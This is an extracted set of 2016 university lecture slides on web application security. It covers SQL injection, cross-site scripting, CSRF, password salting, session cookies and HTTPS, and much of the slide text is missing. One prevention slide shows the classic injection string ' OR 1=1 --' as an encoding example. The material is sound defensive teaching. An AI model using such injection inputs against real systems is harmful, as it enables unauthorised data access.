COMP9321 Web Application EngineeringSemester 2, 2016

Dr. Amin BeheshtiService Oriented Computing Group, CSE, UNSW Australia

Week 9

1COMP9321, 16s2, Week 9

http://webapps.cse.unsw.edu.au/webcms2/course/index.php?cid=2445

Assignment 2

2COMP9321, 16s2, Week 9

The due date for this assignment 2 is (end of Mid Semester Break):Sunday, 2 October 2016, 23:59:59.

Demo will be held during the lab times in week 10.

UNSW, CSE, Calendar:https://student.unsw.edu.au/calendar

Assignment 3

3COMP9321, 16s2, Week 9

Released…

Introduction to Web Application Security

4COMP9321, 16s2, Week 9

Acknowledgements

This presentation contains material prepared by Halvard Skogsrud, SeniorSoftware Engineer, Thoughtworks, Inc. Sydney, Australia and from the OpenWeb Application Security Project (OWASP) http://www.owasp.org

Introduction to Web Application Security

5COMP9321, 16s2, Week 9

Warning

The objective of this presentation is to show you common security loopholesappearing in Web applications. However, it is not meant to encourage you toattack web applications. Such actions are both a breach of the law in mostcountries, and of the CSE policy. Hence, by attempting any of the techniquespresented in this lecture, you may be prosecuted by law enforcement and faceexpulsion from the university.

Securing your Web Application

6COMP9321, 16s2, Week 9

Securing your Web Application: Threats!

7COMP9321, 16s2, Week 9

Securing your Web Application: Threats!

8COMP9321, 16s2, Week 9

Securing your Web Application: Threats!

9COMP9321, 16s2, Week 9

Securing your Web Application: Threats!

10COMP9321, 16s2, Week 9

Securing your Web Application: Requirements!

11COMP9321, 16s2, Week 9

SQL Injection

12COMP9321, 16s2, Week 9

SQL Injection

13COMP9321, 16s2, Week 9

SQL injection:

• is a code injection technique.• used to attack data-driven applications

• How: a malicious SQL statements are inserted into an entry field forexecution.

SQL Injection

14COMP9321, 16s2, Week 9

SQL injection:

• is a code injection technique.• used to attack data-driven applications

• How: a malicious SQL statements are inserted into an entry field forexecution.

SQL Injection: What is wrong?

15COMP9321, 16s2, Week 9

SQL Injection: What is wrong?

16COMP9321, 16s2, Week 9

SQL Injection: What is wrong?

17COMP9321, 16s2, Week 9

Google(comment in sql)

SQL Injection: What is wrong?

18COMP9321, 16s2, Week 9

SQL Injection: Summary!

19COMP9321, 16s2, Week 9

SQL Injection: Prevention!!

20COMP9321, 16s2, Week 9

To keep malicious inputs contained, any inputs written to the database need to be encoded.

SQL encoding: ' OR 1=1 --' is encoded to \ \'\ OR\ 1\=1\ \-\-'

https://en.wikipedia.org/wiki/Secure_input_and_output_handling

SQL Injection: Prevention!!

21COMP9321, 16s2, Week 9

Cross Site Scripting (XSS)

22COMP9321, 16s2, Week 9

Cross Site Scripting (XSS)

23COMP9321, 16s2, Week 9

Cross-site scripting (XSS):

• is a type of computer security vulnerability typically found in web applications.• XSS enables attackers to inject client-side script into web pages viewed by other

users. • A cross-site scripting vulnerability may be used by attackers to bypass access

controls such as the same-origin policy.

Cross Site Scripting (XSS)

24COMP9321, 16s2, Week 9

Cross-site scripting (XSS):

• is a type of computer security vulnerability typically found in web applications.• XSS enables attackers to inject client-side script into web pages viewed by other

users. • A cross-site scripting vulnerability may be used by attackers to bypass access

controls such as the same-origin policy.

• Same-origin policy is an important concept in the web application security model.

• Under the policy, a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin.

Cross Site Scripting (XSS)

25COMP9321, 16s2, Week 9

Cross-site scripting (XSS):

• is a type of computer security vulnerability typically found in web applications.• XSS enables attackers to inject client-side script into web pages viewed by other

users. • A cross-site scripting vulnerability may be used by attackers to bypass access

controls such as the same-origin policy.

• Same-origin policy is an important concept in the web application security model.

• Under the policy, a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin.

e.g., a combination of URI scheme, hostname, and port number.

Cross Site Scripting (XSS): What is wrong?

26COMP9321, 16s2, Week 9

Cross Site Scripting (XSS): What is wrong?

27COMP9321, 16s2, Week 9

Suppose the victim is given this URL by the attacker (www.badguy.com):

Cross Site Scripting (XSS): What is wrong?

28COMP9321, 16s2, Week 9

The web page would then be injected with the following script:

Suppose the victim is given this URL by the attacker (www.badguy.com):

Cross Site Scripting (XSS): Summary!

29COMP9321, 16s2, Week 9

Cross Site Scripting (XSS): Prevention!!

30COMP9321, 16s2, Week 9

Cross Site Scripting (XSS): Prevention!!

31COMP9321, 16s2, Week 9

Cross Site Request Forgery (CSRF)

32COMP9321, 16s2, Week 9

Cross Site Request Forgery (CSRF)

33COMP9321, 16s2, Week 9

Cross-site request forgery

• also known as a one-click attack or session riding• abbreviated as CSRF or XSRF• is a type of malicious exploit of a website whereby unauthorized

commands are transmitted from a user that the website trusts

Cross Site Request Forgery (CSRF)

34COMP9321, 16s2, Week 9

Cross-site request forgery

• also known as a one-click attack or session riding• abbreviated as CSRF or XSRF• is a type of malicious exploit of a website whereby unauthorized

commands are transmitted from a user that the website trusts

Exploit: is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software…

Cross Site Request Forgery (CSRF)

35COMP9321, 16s2, Week 9

Cross-site request forgery

• also known as a one-click attack or session riding• abbreviated as CSRF or XSRF• is a type of malicious exploit of a website whereby unauthorized

commands are transmitted from a user that the website trusts

Exploit: is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software…

Such behavior frequently includes things like gaining control of a computer system, allowing privilege escalation, or a denial-of-service attack.

Cross Site Request Forgery (CSRF)

36COMP9321, 16s2, Week 9

Cross Site Request Forgery (CSRF)

37COMP9321, 16s2, Week 9

Cross Site Request Forgery (CSRF): Prevention!!

38COMP9321, 16s2, Week 9

A CAPTCHA is a type of challenge-response test used in computing todetermine whether or not the user ishuman.

Unvalidated Input

39COMP9321, 16s2, Week 9

Unvalidated Input

40COMP9321, 16s2, Week 9

Unvalidated Input

41COMP9321, 16s2, Week 9

Unvalidated Input: Summary

42COMP9321, 16s2, Week 9

Unvalidated Input: Prevention!

43COMP9321, 16s2, Week 9

Broken Authentication

44COMP9321, 16s2, Week 9

Broken Authentication

45COMP9321, 16s2, Week 9

Google(SHA-1)

Fixing Authentication: How To?!

46COMP9321, 16s2, Week 9

Google(MITM)

Fixing Authentication: Salting Passwords!

47COMP9321, 16s2, Week 9

• In cryptography, a salt is a random data that is used as an additionalinput to a one-way function that hashes a password or passphrase.

• The primary function of salts is to defend against dictionary attacksversus a list of password hashes and against pre-computed rainbowtable attacks.

• e.g. the salt and the password can be concatenated and processedwith a cryptographic hash function, and the resulting output (but notthe original password) can be stored with the salt in a database.

Fixing Authentication: Salting Passwords!

48COMP9321, 16s2, Week 9

Why add Salt?

If each password is simply hashed, identical passwords will have the same hash:There are two drawbacks:

1. Due to the birthday paradox, the attacker can find a password very quickly especially if the number of passwords in the database is large.

In probability theory, the birthday problem or birthday paradox concerns the probability that, in a set of n randomly chosen people, some pair of them will have the same birthday. See: http://en.wikipedia.org/wiki/Birthday_paradox

Fixing Authentication: Salting Passwords!

49COMP9321, 16s2, Week 9

Why add Salt?

If each password is simply hashed, identical passwords will have the same hash. There are two drawbacks:

1. Due to the birthday paradox, the attacker can find a password very quickly especially if the number of passwords in the database is large.

2. An attacker can use a list of precomputed hashes to break passwords in seconds.

A rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. See: http://en.wikipedia.org/wiki/Rainbow_table

Fixing Authentication: Salting Passwords!

50COMP9321, 16s2, Week 9

In order to solve these problems, a salt can be concatenated to the password beforethe digest operation.

A salt is a random number of a fixed length. This salt must be different for eachstored entry. It must be stored as clear text next to the hashed password.

In this configuration, an attacker must handle a brute force attack on eachindividual password. The database is now birthday attack/rainbow crack resistant.

• …consists of systematically checking allpossible keys or passwords until the correctone is found.

• In the worst case, this would involvetraversing the entire search space.

Fixing Authentication: Salting Passwords!

51COMP9321, 16s2, Week 9

Fixing Authentication: Salting Passwords!

52COMP9321, 16s2, Week 9

Fixing Authentication: Salting Passwords!

53COMP9321, 16s2, Week 9

Session Management

54COMP9321, 16s2, Week 9

Session Management: Problem or Solution?!

55COMP9321, 16s2, Week 9

Session Management: Problem or Solution?!

56COMP9321, 16s2, Week 9

Session Management: Problem or Solution?!

57COMP9321, 16s2, Week 9

Set-Cookie: <name>=<value>[; <Max-Age>=<age>] [; expires=<date>][; domain=<domain_name>][; path=<some_path>][; secure][; HttpOnly]

Transport Layer Security

58COMP9321, 16s2, Week 9

Transport Layer Security (e.g. HTTPS)

59COMP9321, 16s2, Week 9

Transport Layer Security (e.g. HTTPS)

60COMP9321, 16s2, Week 9

Google(Secure Sockets Layer , SSL)

Google(Certification Authority , CA)

HTTPS: Basics…

61COMP9321, 16s2, Week 9

HTTPS: Public-Key Cryptography

62COMP9321, 16s2, Week 9

HTTPS: Shared-Key Cryptography

63COMP9321, 16s2, Week 9

HTTPS: Hashing

64COMP9321, 16s2, Week 9

HTTPS: Certificates

65COMP9321, 16s2, Week 9

HTTPS: Signatures

66COMP9321, 16s2, Week 9

HTTPS: How to? … Limitations?!

67COMP9321, 16s2, Week 9

How to?• Follow the steps at:

• https://tomcat.apache.org/tomcat-6.0-doc/ssl-howto.html

Application Layer Security

68COMP9321, 16s2, Week 9

References

69COMP9321, 16s2, Week 9

• http://www.owasp.org• https://tomcat.apache.org/tomcat-6.0-doc/ssl-howto.html

70COMP9321, 16s2, Week 9